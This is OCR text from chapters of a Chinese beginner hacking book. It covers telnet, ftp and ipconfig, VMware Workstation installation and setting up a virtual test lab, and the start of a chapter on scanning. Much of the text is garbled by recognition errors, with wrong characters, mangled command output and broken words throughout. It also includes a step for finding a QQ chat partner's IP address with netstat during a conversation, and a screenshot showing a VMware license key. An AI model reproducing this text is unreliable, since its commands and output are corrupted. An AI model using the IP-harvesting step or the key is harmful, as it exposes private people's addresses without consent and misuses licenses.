telnet 是 传输 控制 协议 /因特网 协议 (TCP/AP)〉 网 


本 Telnet 192.168.1.103 





络 (如 Internet) 的 登录 和 仿真 程序 ， 主 要 用 于 Internet | me 于 于 于 


巾 权 所 有 《<C> 209092 Microsoft Corporation, 保留 所 : 


会 话 。 其 基本 功能 是 允许 用 户 登 录 进 入 远程 主机 系统 。 国人 秆 和 省 和 攻 和， 
telnet 的 命令 格式 为 ，telnet+ 空 格 +IP 地 址 /主机 | 
名 称 ， 如 右 图 所 示 。 
例如 : 如 果 “telnet 192.168.1.103 80” 命 令 执 行 
成 功 ， 则 将 从 IP 地 址 为 192.168.1.103 的 远程 计算 机 上 得 到 “Login: ”提示 符 。 
当 telnet 命令 成 功 连 接 到 远程 系统 上 时 ， 将 显示 登录 信息 并 提示 用 户 输入 用 户 名 和 口令 。 
如 果 用 户 名 和 口令 输入 正确 ， 则 成 功 登录 并 在 远程 系统 上 工作 。 在 telnet 提示 符 后 可 输入 很 多 
命令 来 控制 telnet 会 话 过 程 。 在 telnet 提示 人 符 后 输入 “? ”， 屏 敌 将 显示 telnet 命令 的 帮助 信息 。 


1.4.5 ”传输 协议 0 命令 


ftp 命令 是 Internet 用 户 使 用 最 频繁 的 命令 之 一 ,通过 fp 命令 可 将 文件 传送 到 正在 运行 
FTP 服务 的 远程 计算 机 上 ， 或 从 正在 运行 FTP 服务 的 远程 计算 机 上 下 载 文件 。 在 “命令 提 


示 符 ”窗口 中 运行 “ftp” 命 令 ， 即 可 进入 FTP 子 环境 窗口 如 下 图 所 示 。 在 “运行 ”对 话 框 
中 运行 “ftp” 命 令 ， 也 可 进入 FTP 子 环境 窗口 。 








登录 远程 主机 系统 











郴 管理 员 : C\Windows\system32\cmd.exe - ftp 

















F1P 的 命令 格式 为 : ftp-v-n-d-g [主机 名 ]。 Microsoft Windows [hh 本 6.1.7681] | 
@ _v: 显示 远程 服务 器 的 所 有 啊 应 信息 。 版 权 所 有 Cc》2889 Microsoft Corporation。 保 名 
@ _n. 限制 FTP 的 自动 登录 ， 即 不 使 用 。 a ee ed 

@ -d: 使 用 调试 方式 。 

@ 一 各: 取消 全 局 文件 名 o 进入 FTP 子 环境 窗 图 


1.46 ”查看 网 络 配置 的 ipconiis 命令 


ipconfig 是 调试 计算 机 网 络 的 常用 命令 , 它 通 妾 用 来 显示 计算 机 中 网 络 适配器 的 IP 地址 、 
子 网 措 人 码 及 默认 网 天 ， 这 是 ipconfig 命令 不 禹 参数 的 用 法 。 和 常见 的 用 法 还 有 “ipconfig/all”。 


本 管理 页 ; C:\Windows\system32\cmd,exe 














onfig/al1 
: 4L89D1ETPGHU51U 
Ee898::c5h:93651:dql8Se:c7?2xlL1 
2-168-1-19 
DEE PEE 255 [5 


et pa es ls | 


: Atheros hR8151 PCI-E Gigabit Ethernet Con 


- : 98-2B-34-89-?0-DD 
; 下 
目 
下 一 
- : fe89::c5hb:9651:dl8e:c?7?x11( 目 这 
三 
: 255.255.255.0 





— /fr pe — /A )) 


在 “命令 提示 符 ” 窗口 中 运行 lpconfig 命 令 ， 查看 。 在 “命令 提示 符 ” 窗 口中 运行 “lpconfig/all” 命 
当前 计算 机 的 IPv4、1Pv6 地 址 、 子 网 掩 码 以 及 默 ” 令 ， 查 看 当前 计算 机 的 IP 地 址 、 子 网 掩 码 、DNS 
认 网 关 等 信息 。 后 级 和 DHCP 等 信息 。 


Wy] 


de > 
2 攻防 从 入 门 到 精通 
全 人 人 他 


1.5 在 计算 机 中 创建 虚拟 测试 环境 


无 论 在 测试 和 学 习 黑 客 工 具 操作 方法 还 是 在 攻击 时 , 音 客 都 不 会 合 实 体 计算 机 来 答 试 ， 
而 是 在 计算 机 中 搭建 虚拟 环境 ， 即 在 已 存在 的 系统 中 ， 利 用 虚拟 机 创建 一 个 内 在 的 系统 。 


























该 系统 虽然 与 外 界 独立 ， 但 是 可 以 与 已 经 存在 的 系统 建立 网 络 关系 ， 从 而 方便 使 用 茶 坚 黑 
客 工 具 进 行 模拟 攻击 ， 并 且 一 旦 黑客 工具 对 虚拟 机 造成 了 破坏 ， 也 可 以 很 快 恢复 ， 且 不 会 








影响 目 己 本 来 的 计算 机 系统 ， 使 操作 更 加 安全 。 


151 安装 VMWare 虚拟 机 


日 前 ， 虚 拟 化 技术 已 经 非常 成 熟 ，VMWare Workstation、Virtual PC、Xen、Parallels、 
Virtuozzo 等 虚拟 机 软件 如 雨 后 春 敌 般 出 现 ， 但 最 流行 、 最 弟 用 的 当 属 VMWare Workstation 
了 。VMWare Workstation 是 VYMWare 公司 推出 的 专业 虚拟 机 软件 ， 它 可 以 虚拟 现 有 任何 操 
作 系 统 ， 而 且 使 用 简单 、 容 易 上 手 。 

安装 VMWare Workstation 的 具体 操作 步骤 如 下 。 








STEP01: 局 动 VMWare Workstation STEP02: 设置 安装 类 型 


VMware Workstation 安装 Mware Workstation 安装 


欢迎 蔡 用 VMware Workstation 安装 向 导 设置 类 型 


EA 
选 天 最 送 合 您 须要 的 设置 兴 型 ， 


去 蔡 向 导 将 在 您 的 计 竺 机 上 去 次 VMware Workstation. 
要 释 缤 , 请 单 击 “ 下 一 步 。 


vmware 
Workstation 








在 安装 向 导 界面 中 单 击 “ 下 一 步 ” 按 钮 。 
模式 ， 然 后 单 击 “下 一 步 ” 按 钮 。 
STEP03: 设置 安装 路 径 STEP04: 选择 要 安装 的 文件 夹 


VMware Workstation 安装 


目标 交 件 夹 
单 击 “下 一 步 ” 安 获 到 此 文件 夹 ， 或 单 击 “ 园 改 ” 安装 到 其 他 文件 夹 . 
b 只 BAdministrator 
余 将 VMware Workstation 去 蒜 到 : 4 加 计算 机 | 
一 esos ns b 入 1 (C:) 
b> 本 地 磁盘 (DJ 


PP 本 地 磁盘 (E:) 
bg 本 地 磁盘 (F:) 
> aa 王 叶 (}:) 
里 MSN 上 的 “我 的 网 站 " 








单 击 “更 改 ” 按 钮 。 选中 安装 位 置 后 单 击 “ 确 定 ” 按 钮 。 
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STEROS: 设置 快捷 方式 


返回 “目标 文件 夹 ”界面 


STEP06: 


VMware Workstation 安装 


目标 文件 去 
单 击 “ 下 一 步 ” 卖 获 到 就 文件 兴 ， 或 单 击 “ 更 改 ” 去 著 到 其 他 文件 夹 。 


将 VMware Workstation 去 蒜 到 ; 
D:\ 安 装 


单 击 “下 一 步 ” 按 钮 。 


STEP07: 准备 安装 
VMware Workstation 安装 


已 准备 好 执行 请 求 的 操作 


单 击 “' 备 缤 ” 开 始 此 进程 . 


如 果 要 查看 或 更 改 任意 安 效 设置， 请 单 击 “ 上 一 步 ”. 章 击 “取消 ”可 退出 向 导 . 


单 击 “继续 ”按钮 。 
STEP09: 输入 许可 证 窗 铀 


VMware Workstation 安 闭 


输入 诗 可 证 密 钥 
(可 选 ) 您 可 以 稍 后 博 剖 入 尝 位 皂 ， 


许可 证 密 乌 (LD): (XXXXX-XXXXX-XXXXX-XXXXX-XXXXX) 
1V652-6AJE2-DZF59-8T370-A2UQX 


在 文本 框 中 输入 
许可 证 密 钥 。 


2 





CG 


单 击 “ 输 入 ”按钮 。 


VMware Workstation 安装 


快捷 方式 
选 抒 您 奚 放 人 系统 的 快捷 方式 。 


在 以 下 位 置 亨 建 VMware Workstation 的 快捷 方式 . 


皖 画 台 ) 
开始 全 单程 序 文件 天 介 ) 








根据 需要 勾 选 “桌面 " 和 " 开 园 单 击 “ 下 一 
始 菜 单程 序 文件 夹 ” 复 选 框 。 ” 步 ”按钮 。 
STEP08: 正在 安装 


VMware Workstation 安装 


正在 执行 请 求 的 操作 


请 等 待 向 导热 行 请 求 的 操作 。 这 可 能 元 妥 几 分 钟 时 间 。 


状态 : Installing padkages on the system 
Preparing list of required operations 





查看 安装 进度 条 
STEP10: 成 功 安 装 


VMware Workstation 安装 


vimware 
Workstation 





单 击 “ 完 成 ”按钮 。 


仿 公 人 位 
STEP11: 





重新 启动 计算 


| 全 控制 面板 网 络 和 Internet 、 网 洛 和 共享 中 心 


[ec—m om lem S| 


-| eeseme 2| 


文件 日 编辑 下 看 W。 工具 (D 帮助 上 


控制 面板 主页 


更 改造 也 器 设置 
更 改 高 级 共享 设置 


4L8QD1ETPGKV51W 
(此 计算 机 ] 


童 看 活动 网 阁 


网 络 3 
轩 则 访 ” 计 应 网 阁 


更 改 网 络 设置 
?设置 新 的 法 荣 或 网 洛 
设置 无 线 、 完 闪 、 拨 号 、 临 对 或 VPN 连接 ; 或 设置 路 白 器 或 访问 点 。 
-， 关 接 到 网 洛 


过 括 到 或 重新 注 才 到 无 线 、 有 线 、 授 号 或 VPN 网 络 达 按 。 








运 泽 家 隆 给 和 共享 泛 项 


访问 位 于 其 他 网 将 计 算 机 上 的 文件 和 打印 机 ,或 更 改 共 享 设置- 


打开 “网 络 和 共享 中 心 ” 窗 口 ， 可 看 到 VMware 
Workstation 添 加 的 两 个 网 络 连 接 。 


1.5;2 ”配置 VMWare 虚拟 机 





在 安装 虚拟 操作 系统 前 ， 一 定 要 先 配 置 好 VMWare 虚拟 机 ， 


机 的 配置 过 程 。 
STEP01: 运行 


“VMware Workstation” 





文件 (月 ”编辑 人 E) ”查看 (V) 虚拟 机 (M) 选项 卡 (T) ”帮助 (H) 





vmware 


Workstation 10 





| 连 去 远程 服务 器 


[让 创 娃 新 的 虚拟 机 a| | 
| 


单 击 “ 创 建新 的 虚拟 机 ”选项 。 


是 虚拟 化 物理 机 
全 | 从 现 有 物理 机 创建 去 捧 











STEP03: 安装 客户 机 操作 系统 


安装 客户 机 操作 系统 
虚拟 机 如 同 物理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 


加 稍 后 安装 操作 系统 (5)。 


创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 





贺 选择 “安装 程序 光盘 "“ 安 装 辆 单 击 “下 一 
程序 光盘 映像 文件 "或 “ 稍 后 安装 步 ” 按 钮 。 
操作 系统 ” 单 选 按钮 。 





里 冤 i 





STEP12: 打开 “设备 管理 器 ”窗口 


| 二 操作 (A) “ 理 看 (V) ”帮助 (H) 
旬 罗 | 国 | 加 画 | 


4 :73 4L8QD1ETPGKV51W 
b -CB IDE ATA/ATAPI 演 制 器 
站 便携 设 备 
国 处 理 器 


LS 磁盘 驱动 器 
凑 电池 
李 闫 口 (COM 和 LPT) 


-BY VMware Virtual Ethernet Adapter for VMnet1 
“VMware Virtual Ethernet Adapter for VMnet8 








展开 “网 络 适配器 ”节点 ， 可 以 看 到 其 中 添加 的 
两 块 虚拟 网 卡 。 


下 面 介绍 YMWare 虚拟 
STEP02: 新 建 应 拟 机 


欢迎 使 用 新 建 虚拟 机 向 导 


您 希望 使 用 什么 类 型 的 配置 ? 


名 典型 (推荐 )(T) 
通过 几 个 简单 的 步骤 创建 Workstation 10.0 
虚拟 机 。 


外 自 定义 (高 级 )(C0) 
创建 带 有 5C5I 控制 器 类 型 、 虚 拟 磁盘 类 型 
Ea VMware 产品 兼容 性 等 高 级 选项 


选择 配置 类 型 ， 这 里 选取 “ 典 辆 单 击 “下 一 
型 "模式 以 创建 新 的 虚拟 机 。 ” 步 ”按钮 。 
STEP04: 选择 客户 机 操作 系统 


vmware 
Workstation 








选择 客户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


客户 机 操作 系统 


® Microsoft Windows(W) 
© Linux(L) 
© Novell NetWare{E) 





选中 一 个 客户 机 操 单 击 “ 下 一 步 " 
作 系 统 类 型 。 按钮 。 
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STEP05: 命名 虚拟 机 STEP06: 指定 磁盘 容量 


命名 虚拟 机 指定 磁盘 容重 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 磁盘 大 小 为 多 少 ? 














虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 铺 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 
虚拟 机 名 称 (V): 小 : 随 着 您 向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 逐渐 变 大 。 


最 大 磁盘 大 小 (GB)(5): 
位 置 (LD): 针对 Windows 7 的 建议 大 小 : 60 GB 
D:\Documents\Virtual Machines\Windows 7 


rT TE 鲜 将 虚拟 磁盘 存储 为 单个 文件 (9) 








辆 输入 该 虚 国 单 击 “浏览 ” 国 单 击 “ 下 一 ee epg” ee "下 


拟 机 的 名 ”按钮 选择 存 步 ”按钮 。 大 磁盘 储 为 单个 文件 或 一 步 ” 按 
= 放 位 置 。 关 ik。 分 成 多 个 文件 。 钮 。 
STEP07: 准备 创建 STEP08: 查看 已 创建 的 虚拟 机 





已 准备 好 创建 虚拟 机 
单 击 "完成 "创建 虚 拟 机 。 然 后 可 以 安装 Windows 7。 HF elE) 坪 V) 工 只 帮助 (H) 
组 织 Y 共事 Y 新 建文 件 闪 





将 使 用 下 列 设置 创建 虚拟 机 : 文中 文档 库 
品 下 载 Windows 7 
Windows 7 同 | 点 夯 ye 
E:\WM 癌 最 过 访问 的 位 置 
Workstation 10.0 4 国库 | 


.- 团 PPTV 视 频 
| 自 定 ※ 宰 件 (0Q).，… | b 过 视频 Windows i Windows 


= sn _ = = b 匡 | 图 片 7.vmx.|ck : 7.vmsd 


< 上 一 步 (B) 3 二 国 .六 


D 国 | 迅雷 下 载 





Windows 7.vmx 



































单 击 “ 完 成 ”按钮 ， 即 可 完成 虚拟 机 的 创建 。 进入 虚拟 机 存放 的 路 径 ， 将 会 看 到 已 生成 名 为 
“Windows 7.vmx” 的 虚拟 机 文件 。 


15.3 安 志 虚拟 操作 系统 


装 虚拟 操作 系统 的 具体 操作 步骤 如 下 。 
STEP01: 进入 VMWare 主 窗 口 STEP02: 打开 安装 虚拟 机 文件 的 位 置 


0 - (BI AAA 
文件 四 什 急 EE 查看 WW 走 M#UM) 。 选 员 F(D 帮助 由 (4 Oe 各 库 b 文档 > Virtual Machines y Windows7 ”|| 效 到 Windows 7 
> omowcal 3 EN 


1 归 
习 ~” 团 @ 

















排列 方式 ; 文件 闪 了 


Workstation 1 





[是 连 返 远 得 服务 加 
由 更 创建 折 的 上 专机 有 p> 在于 得 服务 器 上 二 夺 和 管理 帮 拷 机。 
虚拟 化 物理 机 
| | Rete. 


软件 更 新 
， 性 齐 VMware Workstation 的 软件 更 新 





























选择 “打开 虚拟 机 ”选项 。 选中 “Windows 单 击 “ 打 开 ” 按 钮 ， 
7.vmx” 图 标 。 可 打开 新 创建 的 虚拟 机 。 
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攻防 从 入 门 到 精通 





新 


STEPO3: 


返回 VMWare 主 界 面 








六 件 (日 ” 坊 加 {E) ”下 看 QV) 虚拟 机 (M) 延 项 卡 中 帮助 (中 
> ~ 忆 


二 | 击 南 < | 全 windows7 x | 至 # 束 sg 机 
在 此 处 键入 
i Windows 7 

- Windows po 

共享 虚 拉 机 























单 击 窗口 左 侧 的 “我 的 电脑 "> 国 选择 “ 纺 
“Windows 7 栏 ， 在 右 侧 窗口 中 ” 辑 虚 拟 机 届 
可 看 到 该 虚拟 机 主机 硬件 和 软件 ” 置 ”选项 。 
系统 信息 。 


STEP05: 返回 VMWare 主 界 面 


加 Windows 7 - VMware Workstation 

文件 ( 虽 。 编 丝 (E) ”查看 (V) 虚拟 机 (M) 选项 卡 (T) ”帮助 (H) 
了 -| 了 | 光合 名 | 四 器 各局 | 加 
库 x 














QQ 在 此 处 键入 内 容 进 行 搜 索 ~ 








日 加 | 我 的 电脑 
明 Windows 7 
单 共享 虚拟 机 


个 主页 x | 吨 windows7 x 


[#4] Windows 7 


2 |m 
挟 编辑 庶 拟 机 设置 局 


STEP04: 虚拟 机 设置 








栅 件 | 直 页 | 
[ 设备 设备 状态 
三 内 存 已 连接 (5C) 
六 启动 Hj 连接 (0) 


使 用 物理 驱动 器 (P): 
自动 检测 
@@ 使 用 150 映像 文件 (M): 


D: 记 装 软件 \cn_windows 7 
| 高 级 (VW. | 











选择 “CD/DVD(SATA)” 选 项， 在 右 侧 “连接” 选 
项 组 中 可 选择 “使 用 物理 驱动 器 ”或 “使 用 1SO 
映像 文件 " 单 选 按 钮 。 然 后 单 击 "确定 ”按钮 。 


=|9SIx| 


让 
TeeT 


要 支 装 的 语言 到 ): | 中 (总 仁 


时 间 和 货币 格式 位 ) 


键 扫 和 条 上 方法 区 )-; 


设备 
枫 内 存 





按 实 际 安装 操作 系统 的 方式 进行 ， 即 可 完成 虚拟 
机 系统 的 安 狠 。 


选择 “开启 此 虚拟 机 ”选项 。 


1.5.4 VMWare T00ls 安装 





VMware Tools 是 VMware 提供 的 一 套 贴 心 工具 ， 用 于 提高 虚拟 显卡 、 虚 拟 便 和 松 的 性 
能 ， 改 善 忌 标的 性 能 ， 以 及 同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 安 儿 VMware Tools 不 仅 
能 够 提升 虚拟 机 的 性 能 ， 而 且 可 以 使 鼠标 指针 在 虚拟 机 内 外 目 由 移动 ， 再 也 不 需要 使 用 
切换 键 了 。 

安装 VMware Tools 的 其 体操 作 方 法 如 下 。 
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第 1 章 
从 零 开 始 认 识 黑客 


STEP01: 启动 安装 了 操作 系统 的 虚拟 机 STEP02: 安装 向 导 


欢迎 使 用 VMware Tools 的 安装 向 导 


VMware [ool 


安装 向导 将 在 您 的 计算 机 上 安装 VMware Tools。 要 继 
续 ， 博 单 击 " 下 一 步 ”。 


i oD ee er Inc Allrights reserved. This product ts protected by 
national copyright and Intal 


Sand inte 
cove er ne OF More i me VMware 产品 安装 


动 正在 准备 VMware Tools -进行 安装 警 寺 : 此 程序 受 版 权 法 和 国际 条 约 保 护 。 








单 击 虚拟 机 屏幕 弹出 “VMware 产品 。” 单 击 “ 下 一 步 ”按钮 。 
下 方 的 “安装 工具 ” ”安装 ”对 话 框 ， 显 示 安 


按钮 。 痰 进度 条 。 
STEPO3: 选择 安 装 类 型 STEP04: 人 


请 选择 一 种 安装 类 型 。 
典型 安装 (T) 


仅 安 装 该 VMware 产品 使 用 的 程序 功能 。 如 果 您 仅 在 该 VMware 产 
品 上 使 用 这 个 虚拟 机 ， 请 选择 这 个 选项 。 


单 击 ' 安 装 ' 开 始 安 装 。 单 击 " 上 一 步 查 看 或 更 次 任何 安装 设置 。 单 击 "取消 "退出 向 


© 人 
折 有 的 程序 功能 。 如 果 您 希望 在 多 种 VMware 产品 上 运行 这 个 
训 ， 由 这 个 选项 。 


局 自 定 头 安装 (5) 
依 ll 此 选项 世 高 级 


EDJIE OH 


国 选 中 “典型 安装 ”完整 安 。” 轿 单 击 “ 下 一 单 击 “安装 ”按钮 。 
装 " 或 “ 自 定义 安装 " 单 选 按 钮 。 步 ” 按 钮 。 
STEP05: 正在 安装 STEP06: 安装 完成 























.加 | 。 去 装 向 导 正在 安装 VMware Tools， 请 稍 候 。 该 操作 需要 几 分 名 的 时 
eeF 同 本 已经 成 功 了 六 ware Toos, 点 击 完成 人 出 和 


状态 : 
正在 回 滚 操作 : 
ee 

















< 上 =- 步 (B) | | 亲 


< 上 二 步 介 ) | 下 二 步 (N) > | 





系统 开始 安装 并 显示 安装 进度 。 单 击 “完成 ”按钮 ， 重 启 系统 后 即 可 完成 安装 操 
作 。 
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奶 的 扫 换 与 嗅 探 


本 章 主要 介绍 了 黑客 常用 入 侵 工 具 的 使 用 ， 其 中 包括 : 扫描 工具 的 使 用 、 
嗅 探 工 具 的 使 用 以 及 系统 监控 与 网 站 漏洞 攻防 等 有 关 知 识 ， 使 计算 机 用 户 能 够 
及 时 采用 相应 的 保护 措施 。 


〇 确定 目标 主机 IP 地 址 
O 〇 常见 的 几 种 扫描 工具 
〇 嗅 探 的 实现 与 防范 

O 〇 运用 工具 实现 网 络 监控 





< 第 2: 章 
言 县 的 扫 摘 与 限 探 


2.1 确定 扫描 目标 


通过 踩点 与 侦 宗 ， 可 以 锁定 大 致 的 目标 范围 ， 但 要 想 具 体 到 条 合 和 远程 主机 ， 还 需要 经 
一 番 操 作 才 能 确定 扫描 目标 。 


2.41 确定 目标 主机 下 地 址 


只 有 设置 好 网 关 的 IP 地 址 ，TCP/P 协议 才能 实现 不 同 网 络 之 间 的 相互 通信 。 网 关 IP 
地 址 是 具有 路 由 功能 的 设备 卫 地址， 具有 路 由 功能 的 设备 有 路 由 器 、 启 用 了 路 由 协议 的 服 
务 器 《实质 上 相当 于 一 人 台 路 由 器 )、 代 理 服务 器 〈 也 相当 于 一 台 路 由 器 )。 

1. 获取 本 机 IP 地 址 








只 要 计算 机 连接 到 互联 网 上 ， 就 会 有 一 个 IP 地 址 ， 仁 询 本 机 IP 地 址 的 方法 如 下 。 
STEP01: 单 击 “ 开 始 ” 按 钮 STEP02: 执行 cmd 命令 


动 计算 器 


(a Nero Burning ROM 
(eantn 9 


一 Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 相应 的 程序 、 
< 可 Recuva 文件 去 、 文 昼 或 Internet 资源 。 


Exce| 2013 


< 4 Windows 木 马 清道 夫 





在 “开始 ”菜单 中 选择 “运行 ”命令 。 在 文本 框 中 输入 “” 国 单 击 “ 确 定 ” 按 钮 。 


md ”区 人 冬 6 
STEP03: 打开 “命令 提示 符 ” 窗 口 STEP04: 运行 “netstat -n” 命令 


国 入 王 员 : CNWindcws\system32Ncmd,exe , | 是 管理 员 : C:\Windows\system32\cmd.exe 


TCRTTITTTTTT ER a 
由 权 所 有 《c) 2009 Microsoft Corporation., = 6 CUserkrsAnhdministrator>netstat -n 


:MsersNhdministratokr>ipconfig 活动 连接 


lindows IP 配置 协议 ”本 地 地 址 外 部 地 址 状态 

TCP 127?.0.0.1:49454 127.9.8.1:49455 ESTABLISHED 
TCP 127-9.09.1:49455 i Ph ESTABLISHED 
TOP 192.168.1.10:51830 50.16 .35 .225:443 CLOSE_WAIT 
TCP 1922 .168.1.19:52342 202 .198 .23 .195 :5287 ESTABLISHED 
TGP 1922 .168.1.19:53245 123.125 .114.197:890 CLOSE_WAIT 
TCP 192.168.1.10:53246 123.125.114-197:89 ESTABLISHED 


TCP 192.168.1.19:53279 123-125 .112-62:89 CLOSE_WAIT 


TCP 192 .168.1.19:53289 123.125 .112.62:80 CLOSE_WAIT 
TCP 192-168.1.19:53319 61.135.169.125:80 CLOSE_WAIT 
ICP 192-168.1.19:53311 bl.135 .169-125:89 GLOSE_WAIT 
TCP 192-168.1.19:53792 123.125 .114.1061:80 CLOSE_WAIT 
TCP 192.168.1.10:537?03 123.125 .114.161:809 ESTABLISHED 

FaR : TICP 192.168.1.10:537?704 6fl.135.185 .29:80 GLOSE_WAIT 
地 址 - - - - - - - - : fe80::4c8e:68be:23d8:4976x14 TCP 192.168.1.180:537?85 61.135.185.29:80 ESTABLISHED 
: 192.168.168.1 TCP 192.168.1.19:53869 61.135.162.26:80 ESTABLISHED 
2 TCP 192.168.1.19:53879 61.135.162.26:80 CLOSE_WAIT 
: 学 TCP 192 .168.1.19:53974 ol.135.185 .140:80 CLOSE_WhAIT 
< err 














运行 “ipconfig” 命 令 ， 在 运行 结果 中 可 以 看 到 本 ”可 查看 本 机 的 IP 地 址 。 
机 IP 地 址 、 网 关 地 址 等 信息 。 


EB 





一 > 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


STEP05: 使 用 ping 命令 查看 网 站 的 IP STEP06: 使 用 nslookup 命令 查看 网 站 
地 址 信息 SN 的 详 细 信 息 SN 





E 管理 员 : C\Windows\system32\cmd.exe 画 管理 员 : Cc "Windov vs\system3 2\cmd,. Exe 


最 得 = 2ms， 最 长 = ， 平 均 = 2ms 


LIHENTEI 二 二 ii TS iT www.baidu.com 


里 在 Ping www.a.shifen.com [61. -135. 169.125] 具有 32 宇 世 的 数据 : 
61-135-169 .125 的 回复 : 字 交 =32 时 | 国 =3ms TTL=57 


到 = UsekhsnhdminstkFhatok>ns1lookup www- -COmMm 
= 来 自 61.135.169.125 的 回复 : 字 节 =32 时 | 间 =3ms TTL=57 人 

目 

日 


服务 3s: dialdns -hta-net .cn 


来 自 61.135.169.125 的 回复 : 字 节 =32 时 | 四 =2ms TTL=5? 
Address: 202.1086 .46 .151 


61.135.169.125 的 回复 : 字 节 =32 时 | 间 =3ms TTL=5? 


61.135 .169. 1 有 ny 统计 信 , 
数据 包 接收 = 4， 
往返 人 的 洁 弛 和 闸 t /对 条 po: 
= 2ms, 大 长 = = 3ms 


www -dg com 
Addresse 号 2d40e :eli:8100:28::2:16 
bi .135.167.36 


CUsehsNhdministhatohy> 123.125.119.147 


CC: “sers idmninistrator> 





在 “命令 提示 和 从 ”窗口 中 运行 “ping www.baidu.， 在 “命令 提示 符 ” 窗 口中 运行 “nslookup www. 
com” 命 令 ， 即 可 查看 百度 网 站 对 应 的 IP 地 址 。 qq.com” 命 令 ， 即 可 查看 腾讯 网 的 详细 信息 。 


使 用 nslookup 命令 查看 网 站 的 详细 信息 时 , 第 1 个 Address 中 的 IP 地址 是 
© 本 机 所 在 域 的 DNS 服务 器 , 第 2 个 Addresses 是 www.qq.com 所 使 用 的 Web 服 
提示 。 务 器 群 的 IP 地 址 。 





2. 获取 Internet 中 其 他 计算 机 的 IP 地 址 

藻 要 获取 Internet 中 其 他 计算 机 的 IP 地 址 ， 则 首先 需要 与 Ee pa 重信 ， 然 后 
利用 netstat-n 命令 得 看 目标 计算 机 的 卫 地 址 。 这 里 以 QQ 为 例 介 绍 获取 Internet 中 其 他 计 
算 机 的 IP 地 址 的 操作 方法 。 


STEP01: 输入 QQ 账号 和 密码 STEP02: 选择 通信 的 好 友 














| Yele, 


vbn wo 
n 
za 加 OT 


搜索 : 联系 人 、 讨论 组 群 .企业 


2 





我 的 设备 0/1 
我 的 好 友 1/1 
| vbn 








贺 启 动 QO 程 序 , 输入 立 单 击 “ 登 录 * 打开 QQ 主 界面 ， 选 择 好 友 ， 双 击 其 头像 图 标 。 
账号 和 密码 。 按钮 。 
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言 息 的 扫描 与 嗅 探 


STEP03: 与 对 方 进行 交流 


1 vbn 


. 局 甘 - 加 | 0 在 聊天 窗口 中 与 对 方 进行 通信 交流 ， 直 
和 到 对 方 回复 消息 。 


© 选择 在 计算 机 上 登录 Q0 的 好 友 为 对 象 
hl 在 使 用 QQ 与 对 方 通话 时 ， 最 好 选择 利用 计算 机 登录 的 QQ， 尽 量 不 要 先 
所 未 择 利 用 手机 或 平板 电脑 来 登录 的 QQ， 以 便 获 取 其 地 址 ， 





STEP04: 执行 cmd 命令 STEP05: 查看 对 方 的 IP 地 址 


国 Cc"\Windows\system3 


Microsoft Windows [Lh i 
瞩 权 所 有 <C 20n092 Microsoft Gorporation 。 保留 所 
Windows 将 根据 您 所 和 输入 的 匀称 ,为 您 打开 柜 应 的 程序 、 
文件 去 、 文 悦 或 Internet 资源 。 


打开 {O)， 


CNMUsekhskKnhKhSHI >netstat 

活动 连接 
协 说 ”本 地 地 址 外 部 地 址 状态 
TCP 1292-168.1.16902:49278 125.39.170-15:808 昌 
TCP 19292-168.1.1092:49700 58.251.60-.173:80 
TCP 192.1689.1.102:49202 13.207.126.160:80 
TCP 122-.1ti68.1.1092:4297097” bl.l82.131.45 :890 
TGP 122.ti68.1.1o92:49712 he A a pA 
TCP pA hs pA eh A 


GCG: NJsers\KAKASHI > 





按 <Win+R> 组 合 键 打 单 击 “ 确 ”输入 “netstat-n” 后 按 <Enter> 键 , 可 查看 
开 “运行” 对话 框 ， 输 入 定 ” 按 钮 。 ESTABLISHED 状 态 对 应 的 外 部 IP 地 址 ， 该 地 
“cmd" 命令 。 址 为 目标 主机 的 IP 地 址 。 


利用 唤 口 至 看 目标 主机 的 IP 地 址 
大计 算 机 中 拥有 多 个 处 于 ESTABLISHED 状态 的 连接 , 则 需要 学 会 利用 端 


口 查 看 目标 主机 的 IP 地址 ,由 于 QQ 通常 是 采用 80 或 者 8080 号 端口 进行 通信 ， 
车 “外 部 地 址 ”一 栏 中 显示 了 “80” 或 者 “8080” 字 样 ， 则 该 地 址 就 是 查找 的 
目标 IP 地 址 。 





3. 获取 指定 网 站 的 IP 地 址 

获取 指定 网 站 IP 地 址 的 方法 比较 人 简单， 只 和 需 使 用 “ping+ 网 站 网 址 ”命令 即 可 实现 ， 
但 是 在 使 用 该 命令 之 前 ， 必须 确保 计算 机 已 成 功 连接 Internet， 这 里 以 腾讯 网 站 首页 (www. 
qq.com) 为 例 介 绍 获 取 该 网 站 IP 地 址 的 操作 方法 。 
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EA 


& ES 四 sz 
关 肛 攻防 从 入 门 到 精通 
全 人 人 他 


STEP01: 执行 cmd 命令 STEP02: 查看 指定 网 站 的 IP 地 址 


本 管理 员 : C:\Windows\system32\cmd.exe 
Microsoft Windows [h 慨 李 6.1.76081] 
3) Windows 将 根据 您 所 娘 和 的 它 称 ， 为 您 打开 相应 的 程序 、 版 权 所 有 《c》 2889 Microsoft Corporation。 人 怀 留 所 有 权 刊 。 
文件 去 、 文档 或 Internet 资源 。 C:\Users Adninistrator>?ping www.dq.com 


下 在 | 具有 32 字 节 的 数据 : 
] 打开 (OQ): cmd| 3 Co 的 卓 黎 全 于 2 IE =19ms TTL=45 
>= Eo SE HI 站 =13ms TTL=45 
来 自 61-135-157-156 的 子 -2 HIB|=i9ms TTL=45 
来 自 61.135.157.156 的 回 字 节 =32 时 | 四 =1i9ms TTL=45 
61.135.157.156 的 Ping 统计 去 息 ,: 
数据 包 : 已 发 送 = 4， 已 榜 才 = 4， 王 和 失 = 9 《@x 斑 失 》， 


往返 mi 估计 和 上 ki 台 秒 为 单位 >: 

















按 <Win+R> 组 合 键 单 击 “确定 ”输入 “ ping www.qdq.com"” 后 按 <Enter> 键 ， 则 可 
打开 “运行 ”对 话 框 ， 输 按钮 。 看 见 该 网 站 的 IP 地 址 一 一 61.135.157.156。 


入 "cmd" 命令 。 


2.1. 2 了 解 网 站 备案 信息 


